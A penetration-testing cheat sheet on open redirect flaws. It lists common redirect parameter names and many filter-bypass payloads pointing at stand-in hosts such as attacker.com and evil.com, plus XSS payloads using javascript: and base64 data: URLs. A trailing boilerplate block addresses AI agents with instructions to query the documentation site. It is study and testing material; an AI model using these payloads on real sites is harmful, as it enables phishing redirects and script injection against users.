# Open Redirect

Example:

> <https://google.com/?redirect_to=https://gmail.google.com>

Could change to:

> <https://google.com/?redirect_to=https://attacker.com>

Keep an eye out for URL parameters that include certain names, such as `url=`, `redirect=`, `next=`, etc. In some cases, redirect parameters might be labled with just single characters, such as `r=` or `u=`.

When a user accesses to a resource with unauthenticated session, web applications uasually redirect user to login form url which contains the link of the resource as a url parameter. When the user logs in successfully, these applications use the url parameter to redirect user to the url which user attend to access in the begining. Thereforce, the open redirect vulnerability uasually occurs in login form.

## Bypass payload:

Some applications do filter, whitelist or blacklist the redirect parameter before performs it.

### [PayloadsAllTheThings - Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect)

Should fuzzing with all payloads in PayloadsAllTheThings

#### Fuzzing

Replace [www.whitelisteddomain.tld](http://www.whitelisteddomain.tld) from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case

To do this simply modify the WHITELISTEDDOMAIN with value [www.test.com](http://www.test.com) to your test case URL.

```
WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt
```

### Filter Bypass

Shopify login open redirect

```
http://mystore.myshopify.com/account/login?checkout_url=atacker.com
redirect to:
http://mystore.myshopify.com.atacker.com
```

Using a whitelisted domain or keyword

```
www.whitelisted.com.evil.com redirect to evil.com
```

Using CRLF to bypass "javascript" blacklisted keyword

```
java%0d%0ascript%0d%0a:alert(0)
```

Using "//" to bypass "http" blacklisted keyword

```
//google.com
```

Using "https:" to bypass "//" blacklisted keyword

```
https:google.com
```

Using "\\/\\/" to bypass "//" blacklisted keyword (Browsers see \\/\\/ as //)

```
\/\/google.com/
/\/google.com/
```

Using "%E3%80%82" to bypass "." blacklisted character

```
/?redir=google。com
//google%E3%80%82com
```

Using null byte "%00" to bypass blacklist filter

```
//google%00.com
```

Using parameter pollution

```
?next=whitelisted.com&next=google.com
```

Using "@" character, browser will redirect to anything after the "@"

```
http://www.theirsite.com@yoursite.com/
```

Creating folder as their domain

```
http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com
```

Host/Split Unicode Normalization

```
https://evil.c℀.example.com . ---> https://evil.ca/c.example.com
http://a.com／X.b.com
```

XSS from Open URL - If it's in a JS variable

```
";alert(0);//
```

XSS from data:// wrapper

```
http://www.example.com/redirect.php?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
```

XSS from javascript:// wrapper

```
http://www.example.com/redirect.php?url=javascript:prompt(1)
```

## Common injection parameters

```
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
```

## References

<https://book.hacktricks.xyz/pentesting-web/open-redirect>\
<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect>\
<https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viennguyen.gitbook.io/pentester/books/real-world-bug-hunting/1-open-redirect.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.